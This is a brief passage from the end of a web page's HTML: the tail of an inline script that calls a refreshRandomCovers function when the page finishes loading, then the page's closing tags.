    document.addEventListener('DOMContentLoaded', refreshRandomCovers);
  } else {
    refreshRandomCovers();
  }
})();
</script>

</div></body></html>
